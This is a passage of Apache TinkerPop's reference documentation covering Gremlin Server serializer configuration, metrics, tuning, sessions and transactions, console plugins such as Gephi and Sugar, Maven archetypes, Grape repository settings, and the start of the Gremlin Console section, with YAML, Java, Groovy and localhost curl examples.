`Map` where the keys and values get passed to the serializer at its initialization. The available and/or expected
keys are dependent on the serializer being used. Gremlin Server comes packaged with two different serializers:
GraphSON and Gryo.

GraphSON
++++++++

The GraphSON serializer produces human-readable output in JSON format and is a good configuration choice for those
trying to use TinkerPop from non-JVM languages. JSON obviously has wide support across virtually all major
programming languages and can be consumed by a wide variety of tools.

[source,yaml]
 - { className: org.apache.tinkerpop.gremlin.driver.ser.GraphSONMessageSerializerV1d0 }

The above configuration represents the default serialization under the `application/json` MIME type and produces JSON
consistent with standard JSON data types. It has the following configuration option:

[width="100%",cols="3,10,^2",options="header"]
|=========================================================
|Key |Description |Default
|useMapperFromGraph |Specifies the name of the `Graph` (from the `graphs` `Map` in the configuration file) from which to plug in any custom serializers that are tied to it. |_none_
|=========================================================

[source,yaml]
 - { className: org.apache.tinkerpop.gremlin.driver.ser.GraphSONMessageSerializerGremlinV1d0 }

When the standard JSON data types are not enough (e.g. need to identify the difference between `double` and `float`
data types), the above configuration will embed types into the JSON itself. The type embedding uses standard Java
type names, so interpretation from non-JVM languages will be required. It has the MIME type of
`application/vnd.gremlin-v1.0+json` and the following configuration options:

[width="100%",cols="3,10,^2",options="header"]
|=========================================================
|Key |Description |Default
|useMapperFromGraph |Specifies the name of the `Graph` (from the `graphs` `Map` in the configuration file) from which to plug in any custom serializers that are tied to it. |_none_
|=========================================================
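
As with other serializers, a `config` key may accompany these entries. The following sketch (composed only of keys
already shown in the tables above) ties the typed GraphSON serializer to any custom serializers of the `Graph`
named "graph" from the `graphs` section of the configuration:

[source,yaml]
serializers:
  - { className: org.apache.tinkerpop.gremlin.driver.ser.GraphSONMessageSerializerGremlinV1d0,
      config: { useMapperFromGraph: graph }}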

Gryo
++++

The Gryo serializer utilizes Kryo-based serialization, which produces a binary output. This format is best consumed
by JVM-based languages.

[source,yaml]
 - { className: org.apache.tinkerpop.gremlin.driver.ser.GryoMessageSerializerGremlinV1d0 }

It has the MIME type of `application/vnd.gremlin-v1.0+gryo` and the following configuration options:

[width="100%",cols="3,10,^2",options="header"]
|=========================================================
|Key |Description |Default
|bufferSize |The maximum size of the Kryo buffer for use on a single object being serialized. Increasing this value will correct `KryoException` errors that complain of "Buffer too small". |_4096_
|classResolverSupplier |The fully qualified classname of a custom `Supplier<ClassResolver>` which will be used when constructing `Kryo` instances. There is no direct default for this setting, but without a setting the `GryoClassResolver` is used. |_none_
|custom |A list of classes with custom Kryo `Serializer` implementations related to them in the form of `<class>;<serializer-class>`. |_none_
|ioRegistries |A list of `IoRegistry` implementations to be applied to the serializer. |_none_
|serializeResultToString |When set to `true`, results are serialized by first calling `toString()` on each object in the result list resulting in an extended MIME Type of `application/vnd.gremlin-v1.0+gryo-stringd`. When set to `false` Kryo-based serialization is applied. |_false_
|useMapperFromGraph |Specifies the name of the `Graph` (from the `graphs` `Map` in the configuration file) from which to plug in any custom serializers that are tied to it. |_none_
|=========================================================

As described above, there are multiple ways in which to register serializers for Kryo-based serialization. These
configurations can be used in conjunction with one another where there is a specific ordering to how the configurations
are applied. The `useMapperFromGraph` setting is applied first, followed by any `ioRegistries` and finalized by the
`custom` setting.

Those configuring or implementing a `Supplier<ClassResolver>` should consider this an "advanced" option that is
typically important to use cases where server types need to be coerced to client types (i.e. a type is available on
the server but not on the client). Implementations should typically instantiate `ClassResolver` implementations that are
extensions of the `GryoClassResolver` as this class is important to most serialization tasks in TinkerPop.

Metrics
^^^^^^^

Gremlin Server produces metrics about its operations that can yield some insight into how it is performing. These
metrics are exposed in a variety of ways:

* Directly to the console where Gremlin Server is running
* CSV file
* link:http://ganglia.info/[Ganglia]
* link:http://graphite.wikidot.com/[Graphite]
* link:http://www.slf4j.org/[SLF4j]
* link:https://en.wikipedia.org/wiki/Java_Management_Extensions[JMX]

The configuration of each of these outputs is described in the Gremlin Server <<_configuring_2, Configuring>> section.
Regardless of the output, the metrics gathered are the same.
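
As an illustration, a fragment along the following lines (a sketch assembled from the `metrics` keys in the
configuration table above) would enable console and SLF4j reporting:

[source,yaml]
metrics: {
  consoleReporter: {enabled: true, interval: 180000},
  slf4jReporter: {enabled: true, interval: 180000}}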

Each metric is prefixed with
`org.apache.tinkerpop.gremlin.server.GremlinServer` and the following metrics are reported:

* `sessions` - the number of sessions open at the time the metric was last measured.
* `errors` - the number of total errors, mean rate, as well as the 1, 5, and 15-minute error rates.
* `op.eval` - the number of script evaluations, mean rate, 1, 5, and 15-minute rates, minimum, maximum, median, mean,
and standard deviation evaluation times, as well as the 75th, 95th, 98th, 99th and 99.9th percentile evaluation times
(note that these times apply to both sessionless and in-session requests).

Best Practices
~~~~~~~~~~~~~~

The following sections define best practices for working with Gremlin Server.

Tuning
^^^^^^

image:gremlin-handdrawn.png[width=120,float=right] Tuning Gremlin Server for a particular environment may require some simple trial-and-error, but the following represent some basic guidelines that might be useful:

* Gremlin Server defaults to a very modest maximum heap size. Consider increasing this value for non-trivial uses. Maximum heap size (`-Xmx`) is defined with the `JAVA_OPTIONS` setting in `gremlin-server.sh` (see the example following this list).
* When configuring the size of `threadPoolWorker` start with the default of `1` and increment by one as needed to a maximum of `2*number of cores`.
* The "right" size of the `gremlinPool` setting is somewhat dependent on the type of scripts that will be processed
by Gremlin Server. As requests arrive at Gremlin Server they are decoded and queued to be processed by threads in
this pool. When this pool is exhausted of threads, Gremlin Server will continue to accept incoming requests, but
the queue will continue to grow. If left to grow too large, the server will begin to slow. When tuning around
this setting, consider whether the bulk of the scripts being processed will be "fast" or "slow", where "fast"
generally means being measured in the low hundreds of milliseconds and "slow" means anything longer than that.
** If the bulk of the scripts being processed are expected to be "fast", then a good starting point for this setting is `2*threadPoolWorker`.
** If the bulk of the scripts being processed are expected to be "slow", then a good starting point for this setting is `4*threadPoolWorker`.
* Scripts that are "slow" can really hurt Gremlin Server if they are not properly accounted for. `ScriptEngine`
evaluations are blocking operations that aren't easily interrupted, so once a "slow" script is being evaluated in
the context of a `ScriptEngine` it must finish its work. Lots of "slow" scripts will eventually consume the
`gremlinPool`, preventing other scripts from getting processed from the queue.
** To limit the impact of this problem consider properly setting the `scriptEvaluationTimeout` and the `serializedResponseTimeout` to something "sane".
** Test the traversals being sent to Gremlin Server and determine the maximum time they take to evaluate and iterate
over results, then set these configurations accordingly.
** Note that `scriptEvaluationTimeout` does not interrupt the evaluation on timeout. It merely allows Gremlin Server
to "ignore" the result of that evaluation, which means the thread in the `gremlinPool` will still be consumed after
the timeout.
** The `serializedResponseTimeout` will kill the result iteration process and prevent additional processing. In most
situations, the iteration and serialization process is the more costly step in this process as an errant script that
returns a million or more results could send Gremlin Server into a long streaming cycle. Script evaluation, on the
other hand, is usually very fast, occurring on the order of milliseconds, but that is entirely dependent on the
contents of the script itself.
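
As referenced in the first bullet above, raising the heap is a one-line change to the `JAVA_OPTIONS` setting. A
sketch (the `4g` figure is purely illustrative, not a recommendation):

[source,bash]
----
# inside bin/gremlin-server.sh - raise the maximum heap before starting the server
JAVA_OPTIONS="-Xmx4g"
----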
[[parameterized-scripts]]
Parameterized Scripts
^^^^^^^^^^^^^^^^^^^^^

image:gremlin-parameterized.png[width=150,float=left] Use script parameterization. Period. Gremlin Server caches all scripts that are passed to it. The cache is keyed on a hash of the script. Therefore `g.V(1)` and `g.V(2)` will be recognized as two separate scripts in the cache. If that script is parameterized to `g.V(x)`, where `x` is passed as a parameter from the client, there will be no additional compilation cost for future requests on that script. Compilation of a script should be considered "expensive" and avoided when possible.

[source,java]
----
Cluster cluster = Cluster.open();
Client client = cluster.connect();

Map<String,Object> params = new HashMap<>();
params.put("x",4);
client.submit("[1,2,3,x]", params);
----

Cache Management
^^^^^^^^^^^^^^^^

If Gremlin Server processes a large number of unique scripts, the global function cache will grow beyond the memory available to Gremlin Server and an `OutOfMemoryError` will loom. Script parameterization goes a long way to solving this problem, and running out of memory should not be an issue for those cases. If it is a problem, or if script parameterization is not an option for a given use case (perhaps due to the use of <<sessions,sessions>>), it is possible to better control the nature of the global function cache from the client side by issuing scripts with a parameter that helps define how the garbage collector should treat the references.

The parameter is called `#jsr223.groovy.engine.keep.globals` and has four options:

* `hard` - available in the cache for the life of the JVM (default when not specified).
* `soft` - retained until memory is "low" and should be reclaimed before an `OutOfMemoryError` is thrown.
* `weak` - garbage collected even when memory is abundant.
* `phantom` - removed immediately after being evaluated by the `ScriptEngine`.

By specifying an option other than `hard`, an `OutOfMemoryError` in Gremlin Server should be avoided. Of course, this approach comes with the downside that functions could be garbage collected and thus removed from the cache, forcing Gremlin Server to recompile if that script is later encountered.

[source,java]
----
Cluster cluster = Cluster.open();
Client client = cluster.connect();

Map<String,Object> params = new HashMap<>();
params.put("x",4);
params.put("#jsr223.groovy.engine.keep.globals", "soft");
client.submit("[1,2,3,x]", params);
----

[[sessions]]
Considering Sessions
^^^^^^^^^^^^^^^^^^^^

The preferred approach for issuing requests to Gremlin Server is to do so in a sessionless manner. The concept of "sessionless" refers to a request that is completely encapsulated within a single transaction, such that the script in the request starts with a new transaction and ends with a closed transaction. Sessionless requests have their transaction management handled by Gremlin Server, which automatically opens and closes transactions as previously described. The downside to the sessionless approach is that the entire script to be executed must be known at the time of submission so that it can all be executed at once. This requirement makes it difficult for some use cases where more control over the transaction is desired.

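For example, under the sessionless model a complete unit of work travels in a single parameterized request, as in the following hedged Java sketch (it assumes a running server with a `g` binding; the property value is illustrative):

[source,java]
----
Cluster cluster = Cluster.open();
Client client = cluster.connect();

// the entire unit of work is submitted at once - Gremlin Server opens the
// transaction, evaluates the script and commits or rolls back on its own
client.submit("g.addV().property('name', n)",
              Collections.singletonMap("n", "stephen")).all().join();
----
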
For such use cases, Gremlin Server supports sessions. With sessions, the user is in complete control of the start and end of the transaction. This feature comes with some additional expense to consider:

* Initialization scripts will be executed for each session created, so any expense related to them will be incurred each time a session is constructed.
* There will be one script cache per session, which obviously increases memory requirements. The cache is not shared, so as to ensure that a session has isolation from other session environments. As a result, if the same script is executed in each session, the same compilation cost will be paid for each session it is executed in.
* Each session will require its own thread pool with a single thread in it - this ensures that transactional boundaries are managed properly from one request to the next.
* If there are multiple Gremlin Server instances, communication from the client to the server must be bound to the server that the session was initialized in. Gremlin Server does not share session state, as the transactional context of a `Graph` is bound to the thread it was initialized in.

To connect to a session with Java via the `gremlin-driver`, it is necessary to create a `SessionedClient` from the `Cluster` object:

[source,java]
----
Cluster cluster = Cluster.open(); <1>
Client client = cluster.connect("sessionName"); <2>
----

<1> Opens a reference to `localhost` as <<connecting-via-java,previously shown>>.
<2> Creates a `SessionedClient` given the configuration options of the `Cluster`. The `connect()` method is given a `String` value that becomes the unique name of the session. It is often best to simply use a `UUID` to represent the session.

It is also possible to have Gremlin Server manage the transactions as is done with sessionless requests. The user is in control of enabling this feature when creating the `SessionedClient`:

[source,java]
----
Cluster cluster = Cluster.open();
Client client = cluster.connect("sessionName", true);
----

Specifying `true` to the `connect()` method signifies that the `client` should make each request as one encapsulated in a transaction. With this configuration of `client` there is no need to close a transaction manually.

When using this mode of the `SessionedClient` it is important to recognize that global variable state for the session is not necessarily rolled back on failure, depending on where the failure occurs. For example, sending the following script would create a variable "x" in global session scope that would be accessible on the next request:

[source,groovy]
x = 1

However, sending this script, which explicitly throws an exception:

[source,groovy]
y = 2
throw new RuntimeException()

will result in an obvious failure during script evaluation and "y" will not be available to the next request. The complication arises where the script evaluates successfully, but fails during result iteration or serialization. For example, this script:

[source,groovy]
a = 1
g.addV()

would successfully evaluate and return a `Traversal`. The variable "a" would be available on the next request. Similarly, if there was a failure in transaction management on the call to `commit()`, "a" would still be available to the next request.

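To make the session behavior concrete, here is a hedged Java sketch (the session name is illustrative) in which a variable bound by one request remains visible to a later request on the same session:

[source,java]
----
Cluster cluster = Cluster.open();
Client session = cluster.connect("my-session");

// "x" is bound in the session's ScriptEngine by the first request...
session.submit("x = 10").all().join();

// ...and remains available to subsequent requests in that session
int result = session.submit("x + 1").all().join().get(0).getInt(); // 11
----
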
A session is a "heavier" approach to the simple "request/response" approach of sessionless requests, but is sometimes necessary for a given use case.

[[considering-transactions]]
Considering Transactions
^^^^^^^^^^^^^^^^^^^^^^^^

Gremlin Server performs automated transaction handling for "sessionless" requests (i.e. no state between requests) and for "in-session" requests with that feature enabled. It will automatically commit or roll back transactions depending on the success or failure of the request.

Another aspect of transaction management that should be considered is the usage of the `strictTransactionManagement` setting. It is `false` by default, but when set to `true`, it forces the user to pass `aliases` for all requests. The aliases are then used to determine which graphs will have their transactions closed for that request. Running Gremlin Server in this configuration should be more efficient when there are multiple graphs being hosted, as Gremlin Server will only close transactions on the graphs specified by the `aliases`. Keeping this setting `false` will simply have Gremlin Server close transactions on all graphs for every request.

[[considering-state]]
Considering State
^^^^^^^^^^^^^^^^^

With REST and any sessionless requests, there is no variable state maintained between requests. Therefore, when <<connecting-via-console,connecting with the console>>, for example, it is not possible to create a variable in one command and then expect to access it in the next:

[source,groovy]
----
gremlin> :remote connect tinkerpop.server conf/remote.yaml
==>Configured localhost/127.0.0.1:8182
gremlin> :> x = 2
==>2
gremlin> :> 2 + x
No such property: x for class: Script4
Display stack trace? [yN] n
----

The same behavior would be seen with REST or when using sessionless requests through one of the Gremlin Server drivers. If this behavior is desirable, then <<sessions,consider sessions>>.

There is an exception to this notion of state not existing between requests and that is globally defined functions. All functions created via scripts are global to the server.

[source,groovy]
----
gremlin> :> def subtractIt(int x, int y) { x - y }
==>null
gremlin> :> subtractIt(8,7)
==>1
----

If this behavior is not desirable there are several options. A first option would be to consider using sessions. Each session gets its own `ScriptEngine`, which maintains its own isolated cache of global functions, whereas sessionless requests use a single function cache. A second option would be to define functions as closures:

[source,groovy]
----
gremlin> :> multiplyIt = { int x, int y -> x * y }
==>Script7$_run_closure1@6b24f3ab
gremlin> :> multiplyIt(7, 8)
No signature of method: org.apache.tinkerpop.gremlin.groovy.jsr223.GremlinGroovyScriptEngine.multiplyIt() is applicable for argument types: (java.lang.Integer, java.lang.Integer) values: [7, 8]
Display stack trace? [yN]
----

When the function is declared this way, the function is viewed by the `ScriptEngine` as a variable rather than a global function, and since sessionless requests don't maintain state, the function is forgotten for the next request.

A final option would be to manage the `ScriptEngine` cache manually:

[source,bourne]
----
$ curl -X POST -d "{\"gremlin\":\"def divideIt(int x, int y){ x / y }\",\"bindings\":{\"#jsr223.groovy.engine.keep.globals\":\"phantom\"}}" "http://localhost:8182"
{"requestId":"97fe1467-a943-45ea-8fd6-9e889a6c9381","status":{"message":"","code":200,"attributes":{}},"result":{"data":[null],"meta":{}}}
$ curl -X POST -d "{\"gremlin\":\"divideIt(8, 2)\"}" "http://localhost:8182"
{"message":"Error encountered evaluating script: divideIt(8, 2)"}
----

In the above REST-based requests, the bindings contain a special parameter that tells the `ScriptEngine` cache to immediately forget the script after execution. In this way, the function does not end up being globally available.

[[gremlin-plugins]]
Gremlin Plugins
---------------

image:gremlin-plugin.png[width=125]

Plugins provide a way to expand the features of Gremlin Console and Gremlin Server. The following sections describe the plugins that are available directly from TinkerPop. Please see the link:http://tinkerpop.apache.org/docs/x.y.z/dev/provider/#gremlin-plugins[Provider Documentation] for information on how to develop custom plugins.

[[credentials-plugin]]
Credentials Plugin
~~~~~~~~~~~~~~~~~~

image:gremlin-server.png[width=200,float=left] xref:gremlin-server[Gremlin Server] supports an authentication model where user credentials are stored inside of a `Graph` instance. This database can be managed with the xref:credentials-dsl[Credentials DSL], which can be installed in the console via the Credentials Plugin. This plugin is packaged with the console, but is not enabled by default.

[source,groovy]
gremlin> :plugin use tinkerpop.credentials
==>tinkerpop.credentials activated

This plugin imports the appropriate classes for managing the credentials graph.

[[gephi-plugin]]
Gephi Plugin
~~~~~~~~~~~~

image:gephi-logo.png[width=200, float=left] link:http://gephi.github.io/[Gephi] is an interactive visualization, exploration, and analysis platform for graphs. The link:https://marketplace.gephi.org/plugin/graph-streaming/[Graph Streaming] plugin for Gephi provides an link:https://wiki.gephi.org/index.php/Graph_Streaming[API] that can be leveraged to stream graphs and visualize traversals interactively through the Gremlin Gephi Plugin.

The following instructions assume that Gephi has been downloaded and installed. It is further assumed that the Graph Streaming plugin has been installed (`Tools > Plugins`). The following instructions explain how to visualize a `Graph` and `Traversal`.

In Gephi, create a new project with `File > New Project`. In the lower left view, click the "Streaming" tab, open the Master drop down, and right click `Master Server > Start`, which starts the Graph Streaming server in Gephi and by default accepts requests at `http://localhost:8080/workspace0`:

image::gephi-start-server.png[width=800]

IMPORTANT: The Gephi Streaming Plugin doesn't detect port conflicts and will appear to start successfully even if there is something already active on the port it wants to use (8080 by default). Be sure that nothing is running on the port that Gephi will be using before starting the plugin. Failing to do this produces behavior where the console will appear to submit requests to Gephi successfully but nothing will render.

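One hedged way to verify that the port is free before starting the plugin (shown for Linux/OS X with the default port):

[source,bash]
----
$ lsof -i :8080    # no output means nothing is bound to the port
----
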
Start the xref:gremlin-console[Gremlin Console] and activate the Gephi plugin:

[gremlin-groovy]
----
:plugin use tinkerpop.gephi
graph = TinkerFactory.createModern()
:remote connect tinkerpop.gephi
:> graph
----

The above Gremlin session activates the Gephi plugin, creates the "modern" `TinkerGraph`, uses the `:remote` command to set up a connection to the Graph Streaming server in Gephi (with default parameters that will be explained below), and then uses `:submit`, which sends the vertices and edges of the graph to the Gephi Streaming Server. The resulting graph appears in Gephi as displayed in the left image below.

image::gephi-graph-submit.png[width=800]

NOTE: Issuing `:> graph` again will clear the Gephi workspace and then re-write the graph. To manually empty the workspace, do `:> clear`.

Now that the graph is visualized in Gephi, it is possible to link:https://gephi.github.io/users/tutorial-layouts/[apply a layout algorithm], change the size and/or color of vertices and edges, and display labels/properties of interest. Further information can be found in Gephi's tutorial on link:https://gephi.github.io/users/tutorial-visualization/[Visualization]. After applying the Fruchterman Reingold layout, increasing the node size, decreasing the edge scale, and displaying the id, name, and weight attributes, the graph looks as displayed in the right image above.

Visualization of a `Traversal` takes a different approach, as the visualization occurs while the `Traversal` is executing, thus showing a real-time view of its execution. A `Traversal` must be "configured" to operate in this format and for that it requires use of the `visualTraversal` option on the `config` function of the `:remote` command:

[gremlin-groovy,modern]
----
:remote config visualTraversal graph <1>
traversal = vg.V(2).in().out('knows').
  has('age',gt(30)).outE('created').
  has('weight',gt(0.5d)).inV();null
:> traversal <2>
----

<1> Configure a "visual traversal" from your "graph" - this must be a `Graph` instance.
<2> Submit the `Traversal` to visualize to Gephi.

When the `:>` line is called, each step of the `Traversal` that produces or filters vertices generates events to Gephi. The events update the color and size of the vertices at that step with `startRGBColor` and `startSize` respectively. After the first step visualization, it sleeps for the configured `stepDelay` in milliseconds. On the second step, it decays the configured `colorToFade` of all the vertices visited in prior steps by multiplying the current `colorToFade` value for each vertex with the `colorFadeRate`. Setting the `colorFadeRate` value to `1.0` will prevent the color decay.

The screenshots below show how the visualization evolves over the four steps:

image::gephi-traversal.png[width=1200]

To get a sense of how the visualization configuration parameters affect the output, see the example below:

[gremlin-groovy,modern]
----
:remote config startRGBColor [0.0,0.3,1.0]
:remote config colorToFade b
:remote config colorFadeRate 0.5
:> traversal
----

image::gephi-traversal-config.png[width=400]

The visualization configuration above now starts with a blue color (most recently visited), fades the blue color (so that dark green remains on the oldest visited), and fades it more quickly so that the gradient from dark green to blue across steps has higher contrast. The following table provides a more detailed description of the Gephi plugin configuration parameters as accepted via the `:remote config` command:

[width="100%",cols="3,10,^2",options="header"]
|=========================================================
|Parameter |Description |Default
|workspace |The name of the workspace that your Graph Streaming server is started for. |workspace0
|host |The host on which the Graph Streaming server is running. |localhost
|port |The port on which the Graph Streaming server is listening. |8080
|sizeDecrementRate |The rate at which the size of an element decreases on each step of the visualization. |0.33
|stepDelay |The amount of time in milliseconds to pause between step visualizations. |1000
|startRGBColor |A size 3 float array of RGB color values which define the starting color to update most recently visited nodes with. |[0.0,1.0,0.5]
|startSize |The size an element should be when it is most recently visited. |20
|colorToFade |A single char from the set `{r,g,b,R,G,B}` determining which color to fade for vertices visited in prior steps. |g
|colorFadeRate |A float value in the range `(0.0,1.0]` which is multiplied against the current `colorToFade` value for prior vertices; a `1.0` value effectively turns off the color fading of vertices visited in prior steps. |0.7
|visualTraversal |Creates a `TraversalSource` variable in the Console which can be used for visualizing traversals. This configuration option takes two parameters. The first is required and is the name of the `Graph` instance variable that will generate the `TraversalSource`. The second parameter is the variable name that the `TraversalSource` should have when referenced in the Console. If left unspecified, this value defaults to `vg`. |vg
|=========================================================

[[server-plugin]]
Server Plugin
~~~~~~~~~~~~~

image:gremlin-server.png[width=200,float=left] xref:gremlin-server[Gremlin Server] remotely executes Gremlin scripts that are submitted to it. The Server Plugin provides a way to submit scripts to Gremlin Server for remote processing. Read more about the plugin and how it works in the Gremlin Server section on xref:connecting-via-console[Connecting via Console].

NOTE: The Server Plugin is enabled in the Gremlin Console by default.

[[sugar-plugin]]
Sugar Plugin
~~~~~~~~~~~~

image:gremlin-sugar.png[width=120,float=left] In previous versions of Gremlin-Groovy, there were numerous link:http://en.wikipedia.org/wiki/Syntactic_sugar[syntactic sugars] that users could rely on to make their traversals more succinct. Unfortunately, many of these conventions made use of link:http://docs.oracle.com/javase/tutorial/reflect/[Java reflection] and thus were not performant.

In TinkerPop3, these conveniences have been removed in favor of keeping the standard Gremlin-Groovy syntax both in line with Gremlin-Java8 syntax and always the most performant representation. However, for those users that would like to use the previous syntactic sugars (as well as new ones), there is the `SugarGremlinPlugin` (a.k.a. Gremlin-Groovy-Sugar).

IMPORTANT: It is important that the sugar plugin is loaded in a Gremlin Console session prior to any manipulations of the respective TinkerPop3 objects, as Groovy will cache unavailable methods and properties.

[source,groovy]
----
gremlin> :plugin use tinkerpop.sugar
==>tinkerpop.sugar activated
----

TIP: When using Sugar in a Groovy class file, add `static { SugarLoader.load() }` to the head of the file. Note that `SugarLoader.load()` will automatically call `GremlinLoader.load()`.

Graph Traversal Methods
^^^^^^^^^^^^^^^^^^^^^^^

If a `GraphTraversal` property is unknown and there is a corresponding method with said name off of `GraphTraversal`, then the property is assumed to be a method call. This enables the user to omit `( )` from the method name. However, if the property does not reference a `GraphTraversal` method, then it is assumed to be a call to `values(property)`.

[gremlin-groovy,modern]
----
g.V <1>
g.V.name <2>
g.V.outE.weight <3>
----

<1> There is no need for the parentheses in `g.V()`.
<2> The traversal is interpreted as `g.V().values('name')`.
<3> A chain of zero-argument step calls with a property value call.

Range Queries
^^^^^^^^^^^^^

The `[x]` and `[x..y]` range operators in Groovy translate to `RangeStep` calls.

[gremlin-groovy,modern]
----
g.V[0..2]
g.V[0..<2]
g.V[2]
----

Logical Operators
^^^^^^^^^^^^^^^^^

The `&` and `|` operators are overloaded in `SugarGremlinPlugin`. When used, they introduce the `AndStep` and `OrStep` markers into the traversal. See <<and-step,`and()`>> and <<or-step,`or()`>> for more information.

[gremlin-groovy,modern]
----
g.V.where(outE('knows') & outE('created')).name <1>
t = g.V.where(outE('knows') | inE('created')).name; null <2>
t.toString()
t
t.toString()
----

<1> Introducing the `AndStep` with the `&` operator.
<2> Introducing the `OrStep` with the `|` operator.

Traverser Methods
^^^^^^^^^^^^^^^^^

It is rare that a user will ever interact with a `Traverser` directly. However, if they do, some method redirects exist to make it easy.

[gremlin-groovy,modern]
----
g.V().map{it.get().value('name')} // conventional
g.V.map{it.name} // sugar
----

[[utilities-plugin]]
Utilities Plugin
~~~~~~~~~~~~~~~~

The Utilities Plugin provides various functions, helper methods and imports of external classes that are useful in the console.

NOTE: The Utilities Plugin is enabled in the Gremlin Console by default.

[[benchmarking-and-profiling]]
Benchmarking and Profiling
^^^^^^^^^^^^^^^^^^^^^^^^^^

The link:https://code.google.com/p/gperfutils/[GPerfUtils] library provides a number of performance utilities for Groovy. Specifically, these tools cover benchmarking and profiling.

Benchmarking allows execution time comparisons of different pieces of code. While such a feature is generally useful, in the context of Gremlin, benchmarking can help compare traversal performance times to determine the optimal approach.

Profiling helps determine the parts of a program which are taking the most execution time, yielding low-level insight into the code being examined.

[gremlin-groovy,modern]
----
:plugin use tinkerpop.sugar // Activate sugar plugin for use in benchmark
benchmark{
    'sugar' {g.V(1).name.next()}
    'nosugar' {g.V(1).values('name').next()}
}.prettyPrint()
profile { g.V().iterate() }.prettyPrint()
----

[[describe-graph]]
Describe Graph
^^^^^^^^^^^^^^

A good implementation of the Gremlin APIs will validate their features against the xref:validating-with-gremlin-test[Gremlin test suite]. To learn more about a specific implementation's compliance with the test suite, use the `describeGraph` function. The following shows the output for `HadoopGraph`:

[gremlin-groovy,modern]
----
describeGraph(HadoopGraph)
----

[[gremlin-archetypes]]
Gremlin Archetypes
------------------

TinkerPop has a number of link:https://maven.apache.org/guides/introduction/introduction-to-archetypes.html[Maven archetypes], which provide example project templates to quickly get started with TinkerPop. The available archetypes are as follows:

* `gremlin-archetype-server` - An example project that demonstrates the basic structure of a <<gremlin-server,Gremlin Server>> project, how to connect with the Gremlin Driver, and how to embed Gremlin Server in a testing framework.
* `gremlin-archetype-tinkergraph` - A basic example of how to structure a TinkerPop project with Maven.

You can use Maven to generate these example projects with a command like:

[source,shell]
$ mvn archetype:generate -DarchetypeGroupId=org.apache.tinkerpop -DarchetypeArtifactId=gremlin-archetype-server
  -DarchetypeVersion=x.y.z -DgroupId=com.my -DartifactId=app -Dversion=0.1 -DinteractiveMode=false

This command will generate a new Maven project in a directory called "app" with a `pom.xml` specifying a `groupId` of `com.my`. Please see the `README.asciidoc` in the root of each generated project for information on how to build and execute it.

[[gremlin-applications]]
Gremlin Applications
====================

Gremlin applications represent tools that are built on top of the core APIs to help expose common functionality to users when working with graphs. There are two key applications:

. Gremlin Console - A link:http://en.wikipedia.org/wiki/Read%E2%80%93eval%E2%80%93print_loop[REPL] environment for interactive development and analysis
. Gremlin Server - A server that hosts script engines, thus enabling remote Gremlin execution

image:gremlin-lab-coat.png[width=310,float=left] Gremlin is designed to be extensible, making it possible for users and graph system/language providers to customize it to their needs. Such extensibility is also found in the Gremlin Console and Server, where a universal plugin system makes it possible to extend their capabilities. One of the important aspects of the plugin system is the ability to help the user install the plugins through the command line, thus automating the process of gathering dependencies and other error-prone activities.

The process of plugin installation is handled by link:http://groovy.codehaus.org/Grape[Grape], which helps resolve dependencies into the classpath. It is therefore important to ensure that Grape is properly configured in order to use the automated capabilities of plugin installation. Grape is configured by `~/.groovy/grapeConfig.xml` and, generally speaking, if that file is not present, the default settings will suffice. However, they will not suffice if a required dependency is not in one of the default configured repositories. Please see the link:http://groovy.codehaus.org/Grape[Custom Ivy Settings] section of the Grape documentation for more details on the defaults. TinkerPop recommends the following configuration in that file:

[source,xml]
<ivysettings>
  <settings defaultResolver="downloadGrapes"/>
  <resolvers>
    <chain name="downloadGrapes">
      <filesystem name="cachedGrapes">
        <ivy pattern="${user.home}/.groovy/grapes/[organisation]/[module]/ivy-[revision].xml"/>
        <artifact pattern="${user.home}/.groovy/grapes/[organisation]/[module]/[type]s/[artifact]-[revision].[ext]"/>
      </filesystem>
      <ibiblio name="codehaus" root="http://repository.codehaus.org/" m2compatible="true"/>
      <ibiblio name="central" root="http://central.maven.org/maven2/" m2compatible="true"/>
      <ibiblio name="jitpack" root="https://jitpack.io" m2compatible="true"/>
      <ibiblio name="java.net2" root="http://download.java.net/maven/2/" m2compatible="true"/>
    </chain>
  </resolvers>
</ivysettings>

The Grape configuration can also be modified to include the local system's Maven `.m2` directory by one or both of the following entries:

[source,xml]
<ibiblio name="apache-snapshots" root="http://repository.apache.org/snapshots/" m2compatible="true"/>
<ibiblio name="local" root="file:${user.home}/.m2/repository/" m2compatible="true"/>

These configurations are useful during development of TinkerPop plugins (i.e. if one is working with locally built artifacts).
It is important to take note of the order used for these references, as Grape will check them in the order they are specified, and depending on that order, an artifact other than the one expected may be used, which is typically an issue when working with SNAPSHOT dependencies.

WARNING: If building TinkerPop from source, be sure to clear TinkerPop-related jars from the `~/.groovy/grapes` directory, as they can become stale on some systems and not re-import properly from the local `.m2` after fresh rebuilds.

[[gremlin-console]]
Gremlin Console
---------------

image:gremlin-console.png[width=325,float=right] The Gremlin Console is an interactive terminal or link:http://en.wikipedia.org/wiki/Read%E2%80%93eval%E2%80%93print_loop[REPL] that can be used to traverse graphs and interact with the data that they contain. It represents the most common method for performing ad-hoc graph analysis, small to medium sized data loading projects and other exploratory functions. The Gremlin Console is highly extensible, featuring a rich plugin system that allows new tools, commands, link:http://en.wikipedia.org/wiki/Domain-specific_language[DSLs], etc. to be exposed to users.

To start the Gremlin Console, run `gremlin.sh` or `gremlin.bat`:

[source,text]
----
$ bin/gremlin.sh

         \,,,/
         (o o)
-----oOOo-(3)-oOOo-----
plugin loaded: tinkerpop.server
plugin loaded: tinkerpop.utilities
plugin loaded: tinkerpop.tinkergraph
gremlin>
----

NOTE: If the above plugins are not loaded then they will need to be enabled or else certain examples will not work. If using the standard Gremlin Console distribution, then the plugins should be enabled by default. See below for more information on the `:plugin use` command to manually enable plugins. These plugins, with the exception of `tinkerpop.tinkergraph`, cannot be removed from the Console as they are a part of the `gremlin-console.jar` itself. These plugins can only be deactivated.

The Gremlin Console is loaded and ready for commands. Recall that the console hosts the Gremlin-Groovy language. Please review link:http://groovy.codehaus.org/[Groovy] for help on Groovy-related constructs. In short, Groovy is a superset of Java. What works in Java, works in Groovy. However, Groovy provides many shorthands to make it easier to interact with the Java API. Moreover, Gremlin provides many neat shorthands to make it easier to express paths through a property graph.

[gremlin-groovy]
----
i = 'goodbye'
j = 'self'
i + " " + j
"${i} ${j}"
----

The "toy" graph provides a way to get started with Gremlin quickly.

[gremlin-groovy]
----
g = TinkerFactory.createModern().traversal(standard())
g.V()
g.V().values('name')
g.V().has('name','marko').out('knows').values('name')
----

TIP: When using Gremlin-Groovy in a Groovy class file, add `static { GremlinLoader.load() }` to the head of the file.

Console Commands
~~~~~~~~~~~~~~~~

